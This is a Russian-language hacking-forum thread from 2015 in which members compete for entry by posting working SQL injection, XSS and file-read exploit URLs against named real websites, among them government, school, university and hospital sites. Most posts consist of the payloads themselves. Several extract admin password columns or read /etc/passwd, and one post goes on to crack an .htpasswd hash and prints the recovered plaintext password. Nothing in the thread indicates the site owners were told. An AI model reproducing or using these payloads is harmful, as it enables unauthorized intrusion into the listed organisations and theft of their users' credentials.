Эксплойт: http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33, 34,35 -- (http://lineforheaven.com/soul.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,version(),25,26,27,28,29,30,31,32,33,34, 35 --)
3)Сайт: https://www.harptabs.com
Уязвимость: SQLi
Эксплойт: https://www.harptabs.com/login.php
Я нашел логин пользователя на сайте и вписал:
Логин: Ceja8460' or 1=1#
Пароль: Ceja8460' or 1=1 '#
Зашло под логином:
Welcome, Ceja8460' or 1=1#
4)Сайт: http://www.ibdb.com/search.php
Уязвимость: XSS
Эксплойт: http://www.ibdb.com/search.php
в поле поиска вписываем: alert('antichat.ru')
5)Сайт: http://www.kpa.gov.my
Уязвимость: XSS(в поиску), SQLi
Єксплойт: http://www.kpa.gov.my/pages.php?mod=search_result
SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:
http://www.kpa.gov.my/modules/web/page_print.php?id=
Допустим что я нашёл ХХЕ. Как правильно её постить тут и что должно быть в выводе?
↑ (https://antichat.live/posts/3864572/)
Допустим что я нашёл ХХЕ. Как правильно её постить тут и что должно быть в выводе?
например, прочитать /etc/passwd. выложить полный запрос (можно перехватить через burp suite, например)
joelblack
08.07.2015, 14:33
target:police.gov.bd
type:SQL Injection
version:5.1.69
http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5 ,6,7,8,9,10,11,12,13,14,15,16+from+information_sch ema.tables+--+
↑ (https://antichat.live/posts/3863642/)
1)Сайт:
http://dogarchive.kennel-apbt.com/
Уязвимость SQLi
Эксплойт:
http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php (http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=%2Findex.php)
вписываем:
логин - ' or 1=1#
пароль - ' or 1=1 '#
И видим снизу:
Online registred users:
admin и т.д
2) Сайт:
http://lineforheaven.com/soul.php?id=174
Уязвимость: SQLi
Эксплойт:
http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33, 34,35 -- (http://lineforheaven.com/soul.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,version(),25,26,27,28,29,30,31,32,33,34, 35 --)
3)Сайт:
https://www.harptabs.com
Уязвимость: SQLi
Эксплойт:
https://www.harptabs.com/login.php
Я нашел логин пользователя на сайте и вписал:
Логин: Ceja8460' or 1=1#
Пароль: Ceja8460' or 1=1 '#
Зашло под логином:
Welcome, Ceja8460' or 1=1#
4)Сайт:
http://www.ibdb.com/search.php
Уязвимость: XSS
Эксплойт:
http://www.ibdb.com/search.php
в поле поиска вписываем: alert('antichat.ru')
5)Сайт:
http://www.kpa.gov.my
Уязвимость: XSS(в поиску), SQLi
Єксплойт:
http://www.kpa.gov.my/pages.php?mod=search_result
SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:
http://www.kpa.gov.my/modules/web/page_print.php?id=
1) SQL в username, а не в поле пароля.
admin'or(1)='1
123
2) ОК
3) Не смог разлогиниться, удаление куков не помогло.
Тоже ошибся в каком-то из полей.
4) Наверное всё-таки не стоит указывать имя ресурса. Администрация уязвимого ресурса (а они смотрят логи), да и форума, скорее всего, не одобрит.
5) SQL Inj там нету. Ошибка из NULL в качестве значения переменной.
ocheretko
10.07.2015, 04:09
XSS уязвимость
http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22 %3E%3Cscript%3Ealert%28
/XSS/%29%3C/script%3E
ocheretko
10.07.2015, 06:20
Сайт: http://celtsat.com.br
Уязвимость: SQL Injection
Эксплоит:
http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x78 7878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.albit.com.au (http://www.albit.com.au)
Уязвимость: SQL Injection
Эксплоит:
http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x78 7878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: nijifan.com
Уязвимость: SQL Injection
Эксплоит:
http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E69 6F6E787878+,0x787878756E696F6E787878--
Сайт: www.apva.org (http://www.apva.org)
Уязвимость: SQL Injection
Эксплоит:
http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x78787 8756E696F6E787878+,0x787878756E696F6E787878+,0x787 878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.th.boots.com (http://www.th.boots.com)
Уязвимость: SQL Injection
Эксплоит:
http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select +0x787878756E696F6E787878+,0x787878756E696F6E78787 8+,0x787878756E696F6E787878+,0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878--
Сайт: www.shanson.biz (http://www.shanson.biz)
Уязвимость: SQL Injection
Эксплоит:
http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x7878 78756E696F6E787878+,0x787878756E696F6E787878+,0x78 7878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.io-arch.com (http://www.io-arch.com)
Уязвимость: SQL Injection
Эксплоит:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E 696F6E787878+,0x787878756E696F6E787878+,0x78787875 6E696F6E787878+,0x787878756E696F6E787878+,0x787878 756E696F6E787878+,0x787878756E696F6E787878+,0x7878 78756E696F6E787878+,0x787878756E696F6E787878+,0x78 7878756E696F6E787878--
Сайт: www.tokaiguitar.de (http://www.tokaiguitar.de)
Уязвимость: SQL Injection
Эксплоит:
http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x 787878756E696F6E787878+,0x787878756E696F6E787878+, 0x787878756E696F6E787878+,0x787878756E696F6E787878 +,0x787878756E696F6E787878+,0x787878756E696F6E7878 78+,0x787878756E696F6E787878+,0x787878756E696F6E78 7878--
Сайт: islamic-wallpapers.com
Уязвимость: SQL Injection
Эксплоит:
http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x7878787 56E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.florentina.ro (http://www.florentina.ro)
Уязвимость: SQL Injection
Эксплоит:
http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x7878 78756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.pronv.us (http://www.pronv.us)
Уязвимость: SQL Injection
Эксплоит:
http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878+,0x787878756E696 F6E787878+,0x787878756E696F6E787878+,0x787878756E6 96F6E787878+,0x787878756E696F6E787878+,0x787878756 E696F6E787878+,0x787878756E696F6E787878+,0x7878787 56E696F6E787878+,0x787878756E696F6E787878+,0x78787 8756E696F6E787878+,0x787878756E696F6E787878+,0x787 878756E696F6E787878+,0x787878756E696F6E787878+,0x7 87878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: ravco.jp
Уязвимость: SQL Injection
Эксплоит:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787 878756E696F6E787878+,0x787878756E696F6E787878+,0x7 87878756E696F6E787878+,0x787878756E696F6E787878+,0 x787878756E696F6E787878+,0x787878756E696F6E787878+ ,0x787878756E696F6E787878+,0x787878756E696F6E78787 8+,0x787878756E696F6E787878+,0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878--
Сайт: www.themasterswoodshop.com (http://www.themasterswoodshop.com)
Уязвимость: SQL Injection
Эксплоит:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x 787878756E696F6E787878+,0x787878756E696F6E787878+, 0x787878756E696F6E787878+,0x787878756E696F6E787878--
ocheretko
10.07.2015, 06:31
Сайт:www.themasterswoodshop.com (http://www.themasterswoodshop.com)
Уязвимость: Local File Reading
Эксплоит:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select% 20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file( 0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4--
Сайт:www.io-arch.com (http://www.io-arch.com)
Уязвимость: Local File Reading
Эксплоит:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20 UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F657463 2F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9--
Сайт:www.ravco.jp (http://www.ravco.jp)
Уязвимость: Local File Reading
Эксплоит:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20% 20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574 632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(H EX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F70617 3737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x 5B6B65795D,load_file(0x2F6574632F706173737764),0x5 B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,l oad_file(0x2F6574632F706173737764),0x5B6B65795D))) %20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2 F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX (HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706 173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT( 0x5B6B65795D,load_file(0x2F6574632F706173737764),0 x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D ,load_file(0x2F6574632F706173737764),0x5B6B65795D) ))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0 x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNH EX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F7 06173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCA T(0x5B6B65795D,load_file(0x2F6574632F706173737764) ,0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B6579 5D,load_file(0x2F6574632F706173737764),0x5B6B65795 D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file (0x2F6574632F706173737764),0x5B6B65795D)))%20,%20U NHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632 F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CON CAT(0x5B6B65795D,load_file(0x2F6574632F70617373776 4),0x5B6B65795D)))%20--
Сайт: http://www.thebandroom.biz/
Уязвимость: SQL Injection
Эксплоит:
http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@versio n,19,20,21 and '0'='0
Сайт:http://www.sacaindia.org/
Уязвимость: SQL Injection
Эксплоит:
http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0
Сайт:http://www.offball.com/
Уязвимость: SQL Injection
Эксплоит:
http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5
Сайт:http://www.coolncute.com/
Уязвимость: SQL Injection
Эксплоит:
http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,1 4&sort=1
Сайт:http://www.damandiri.or.id/
Уязвимость: SQL Injection
Эксплоит:
http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0
Сайт:http://www.begeerte.be/
Уязвимость: SQL Injection
Эксплоит:
http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20 and '0'='0
Сайт:http://www.hospitallocaldepiedecuesta.org/
Уязвимость: SQL Injection
Эксплоит:
http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0
Сайт:http://www.etssp.com/
Уязвимость: SQL Injection
Эксплоит:
http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--
Сайт:http://www.worldbarefootcouncil.com/
Уязвимость: SQL Injection
Эксплоит:
http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0
Сайт:http://www.kulmbacher-tierheim.de/
Уязвимость: SQL Injection
Эксплоит:
http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9
http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,em ail),5,6,7,8,9,10,11,12+from+db_users+limit+2,1--
http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_w s(0x3a,id,email,password,admin_user_level_id,activ e),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1
И вот не докрутил тут, глянь, интересно что там http://integra.eu/press.cfm?id=327
Сайт: www.marcied.com (http://www.marcied.com)
Уязвимость: SQL Injection
Эксплоит:
http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17+--+
↑ (https://antichat.live/posts/3866257/)
target:police.gov.bd
type:SQL Injection
version:5.1.69
http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5 ,6,7,8,9,10,11,12,13,14,15,16+from+information_sch ema.tables+--+
добавил
↑ (https://antichat.live/posts/3866740/)
XSS уязвимость
http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22 %3E%3Cscript%3Ealert%28
/XSS/%29%3C/script%3E
↑ (https://antichat.live/posts/3866748/)
Сайт:
http://celtsat.com.br
Уязвимость: SQL Injection
Эксплоит:
http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x78 7878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.albit.com.au (http://www.albit.com.au)
Уязвимость: SQL Injection
Эксплоит:
http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x78 7878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: nijifan.com
Уязвимость: SQL Injection
Эксплоит:
http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E69 6F6E787878+,0x787878756E696F6E787878--
Сайт:
www.apva.org (http://www.apva.org)
Уязвимость: SQL Injection
Эксплоит:
http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x78787 8756E696F6E787878+,0x787878756E696F6E787878+,0x787 878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.th.boots.com (http://www.th.boots.com)
Уязвимость: SQL Injection
Эксплоит:
http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select +0x787878756E696F6E787878+,0x787878756E696F6E78787 8+,0x787878756E696F6E787878+,0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878--
Сайт:
www.shanson.biz (http://www.shanson.biz)
Уязвимость: SQL Injection
Эксплоит:
http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x7878 78756E696F6E787878+,0x787878756E696F6E787878+,0x78 7878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.io-arch.com (http://www.io-arch.com)
Уязвимость: SQL Injection
Эксплоит:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E 696F6E787878+,0x787878756E696F6E787878+,0x78787875 6E696F6E787878+,0x787878756E696F6E787878+,0x787878 756E696F6E787878+,0x787878756E696F6E787878+,0x7878 78756E696F6E787878+,0x787878756E696F6E787878+,0x78 7878756E696F6E787878--
Сайт:
www.tokaiguitar.de (http://www.tokaiguitar.de)
Уязвимость: SQL Injection
Эксплоит:
http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x 787878756E696F6E787878+,0x787878756E696F6E787878+, 0x787878756E696F6E787878+,0x787878756E696F6E787878 +,0x787878756E696F6E787878+,0x787878756E696F6E7878 78+,0x787878756E696F6E787878+,0x787878756E696F6E78 7878--
Сайт: islamic-wallpapers.com
Уязвимость: SQL Injection
Эксплоит:
http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x7878787 56E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.florentina.ro (http://www.florentina.ro)
Уязвимость: SQL Injection
Эксплоит:
http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x7878 78756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.pronv.us (http://www.pronv.us)
Уязвимость: SQL Injection
Эксплоит:
http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878+,0x787878756E696 F6E787878+,0x787878756E696F6E787878+,0x787878756E6 96F6E787878+,0x787878756E696F6E787878+,0x787878756 E696F6E787878+,0x787878756E696F6E787878+,0x7878787 56E696F6E787878+,0x787878756E696F6E787878+,0x78787 8756E696F6E787878+,0x787878756E696F6E787878+,0x787 878756E696F6E787878+,0x787878756E696F6E787878+,0x7 87878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: ravco.jp
Уязвимость: SQL Injection
Эксплоит:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787 878756E696F6E787878+,0x787878756E696F6E787878+,0x7 87878756E696F6E787878+,0x787878756E696F6E787878+,0 x787878756E696F6E787878+,0x787878756E696F6E787878+ ,0x787878756E696F6E787878+,0x787878756E696F6E78787 8+,0x787878756E696F6E787878+,0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878--
Сайт:
www.themasterswoodshop.com (http://www.themasterswoodshop.com)
Уязвимость: SQL Injection
Эксплоит:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x 787878756E696F6E787878+,0x787878756E696F6E787878+, 0x787878756E696F6E787878+,0x787878756E696F6E787878--
это добавил.
↑ (https://antichat.live/posts/3866749/)
Сайт:
www.themasterswoodshop.com (http://www.themasterswoodshop.com)
Уязвимость:
Local File Reading
Эксплоит:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select% 20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file( 0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4--
Сайт:
www.io-arch.com (http://www.io-arch.com)
Уязвимость:
Local File Reading
Эксплоит:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20 UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F657463 2F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9--
Сайт:
www.ravco.jp (http://www.ravco.jp)
Уязвимость:
Local File Reading
Эксплоит:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20% 20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574 632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(H EX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F70617 3737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x 5B6B65795D,load_file(0x2F6574632F706173737764),0x5 B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,l oad_file(0x2F6574632F706173737764),0x5B6B65795D))) %20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2 F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX (HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706 173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT( 0x5B6B65795D,load_file(0x2F6574632F706173737764),0 x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D ,load_file(0x2F6574632F706173737764),0x5B6B65795D) ))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0 x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNH EX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F7 06173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCA T(0x5B6B65795D,load_file(0x2F6574632F706173737764) ,0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B6579 5D,load_file(0x2F6574632F706173737764),0x5B6B65795 D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file (0x2F6574632F706173737764),0x5B6B65795D)))%20,%20U NHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632 F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CON CAT(0x5B6B65795D,load_file(0x2F6574632F70617373776 4),0x5B6B65795D)))%20--
это, скорее, sqli с правами на чтение, поэтому защитано как sqli. Добавил +28 очков
↑ (https://antichat.live/posts/3868966/)
http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,em ail),5,6,7,8,9,10,11,12+from+db_users+limit+2,1--
http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_w s(0x3a,id,email,password,admin_user_level_id,activ e),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1
И вот не докрутил тут, глянь, интересно что там
http://integra.eu/press.cfm?id=327
добавил
↑ (https://antichat.live/posts/3870146/)
Сайт:
www.marcied.com (http://www.marcied.com)
Уязвимость:
SQL Injection
Эксплоит:
http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17+--+
sqli гуглится, не добавлена.
↑ (https://antichat.live/posts/3868461/)
Сайт:
http://www.thebandroom.biz/
Уязвимость: SQL Injection
Эксплоит:
http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@versio n,19,20,21 and '0'='0
Сайт:
http://www.sacaindia.org/
Уязвимость: SQL Injection
Эксплоит:
http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0
Сайт:
http://www.offball.com/
Уязвимость: SQL Injection
Эксплоит:
http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5
Сайт:
http://www.coolncute.com/
Уязвимость: SQL Injection
Эксплоит:
http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,1 4&sort=1
Сайт:
http://www.damandiri.or.id/
Уязвимость: SQL Injection
Эксплоит:
http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0
Сайт:
http://www.begeerte.be/
Уязвимость: SQL Injection
Эксплоит:
http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20 and '0'='0
Сайт:
http://www.hospitallocaldepiedecuesta.org/
Уязвимость: SQL Injection
Эксплоит:
http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0
Сайт:
http://www.etssp.com/
Уязвимость: SQL Injection
Эксплоит:
http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--
Сайт:
http://www.worldbarefootcouncil.com/
Уязвимость: SQL Injection
Эксплоит:
http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0
Сайт:
http://www.kulmbacher-tierheim.de/
Уязвимость: SQL Injection
Эксплоит:
http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9
тоже все добавил, вы проходите
у нас уже трое человек попавших через конкурс, @Печа (https://antichat.live/members/263247/), @3nvY (https://antichat.live/members/265683/), @ocheretko (https://antichat.live/members/124481/)
ocheretko
22.07.2015, 15:50
Сайт Украинского телеканала
http://www.hromadske.tv/search?s=%27;alert%28%27antichat%27%29;//
Уязвимость интересна новичкам тем, что работает в Chrome - инжект в Javascript var stext1 = '';alert('antichat');//';
Сайт: www.gamagroupusa.com (http://www.gamagroupusa.com)
Уязвимость: Sql inj
http://www.gamagroupusa.com/index.php?i=1+union+select+1,2,3,version()+--+
semen6192
23.07.2015, 10:50
Сайт: http://www.karmatube.org
Уязвимость: XSS
Эксплоит:
http://www.karmatube.org/videos.php?op=filter&cat=%253Cscript%253Ealert%28%25271%2527%29%253C/script%253E
http://www.sicb.org/
FILE_PRIV=Y
106 columns
/etc/passwd:
http://www.sicb.org/meetings/2015/schedule/abstractdetails.php?id=199999997 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,load_file(0x2f6574632 f706173737764),48,49,50,51,52,53,54,55,56,57,58,59 ,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92, 93,94,95,96,97,98,99,100,101,102,103,104,105,106+f rom+mysql.user
Методом ручного фазинга узнаем расположение логов.
Читаем логи /var/log/httpd/error_log и видим расположение файлов веб-сервера в /var/www/html
Читаем .htaccess админки из /var/www/html/admin/.htaccess:
AuthUserFile /home/sicb/includes/.htpasswd
AuthName "SICB Admin realm"
AuthType Basic
require valid-user
Читаем файл с паролем и брутим:
ruedi:UMn02wTYUxVGc -> ottilie
Но фейл в админку не пускает, видимо фильтр по IP т.к. бейсик авторизацию уже мы проходим.
PS БД очень большая в ней 9 БД и инфа начиная с 2002 года о студентах, докторах, профессорах. Дампить не стал.
user6334
23.07.2015, 14:28
Site: http://www.safetylit.org
Уязвимость: SQL Injection
Эксплоит:
http://www.safetylit.org/week/journalpage.php?jid=-1+UNION+SELECT+1,2,3,user(),5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35+--+
joelblack
23.07.2015, 15:52
target:http://som.adzu.edu.ph
type:SQL Injection
version:10.0.20-MariaDB-log
user:som@localhost
http://som.adzu.edu.ph/newsupdates/index.php?id=-1+union+select+1,version(),table_name,user(),5,6+f rom+information_schema.tables+--+
target:http://www.bulsu.edu.ph
type:SQL Injection
version:5.1.63-community-log
user:bulsued_friedel@207.198.102.22
http://www.bulsu.edu.ph/footer.php?id=-2 UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES
target:http://www.ntc.gov.ph
type:SQL Injection
version:10.0.15-MariaDB
user:root@localhost
http://www.ntc.gov.ph/announcements_news.php?id=-24+union+select+1,version(),user(),4,table_name,6, 7+from+information_schema.tables+--+
target:http://www.irishsanghatrust.ie
type:SQL Injection
version:5.0.83-community
user:u1094094_sangha@172.16.5.126
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version(),user(),4,5,6,7,table_n ame,9,10,11,12,13,141,15,16,17,18+from+information _schema.tables+--+
target:http://www.mtzwear.com
type:SQL Injection
version:5.5.10
user:mtzwear.com@localhost
http://www.mtzwear.com/eng/art_catalogo.php?id=-43 union select 1,2,3,4,5,6,7,8,table_name,user(),11 from information_schema.tables
user6334
24.07.2015, 07:03
Site: http://www.packsend.co.uk
Уязвимость: SQL Injection
Эксплоит:
http://www.packsend.co.uk/news.php?n=-1+UNION+SELECT+1,2,user(),4,5,6,7,8+--+
joelblack
26.07.2015, 01:34
target: http://www.romanianwriters.ro
type: SQL Injection
version: 5.1.61-0ubuntu0.10.10.1
user: romanian_rowri@localhost
http://www.romanianwriters.ro/s.php?id=-1'+UNION+select+1,convert(table_name using latin1),3+from+information_schema.tables+limit+1,1 +--+
target: http://www.bransonparksandrecreation.com
type: SQL Injection
version: 5.0.96-log1
user: bransonparks@173.201.216.51
http://www.bransonparksandrecreation.com/page.php?id=74 and(select 1 from(select count(*),concat((select (select concat(table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1+--+
target: http://www.microtekusa.com/
type: SQL Injection
version: 5.0.77
user: root@localhost
http://www.microtekusa.com/products.php?KindID=3&ID=-34+union+select+1,2,3,4,5,6,version(),user(),9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,table_name,57,5 8,59,60,61,62,63,64,65,66+from+information_schema. tables+--+
ocheretko
26.07.2015, 06:57
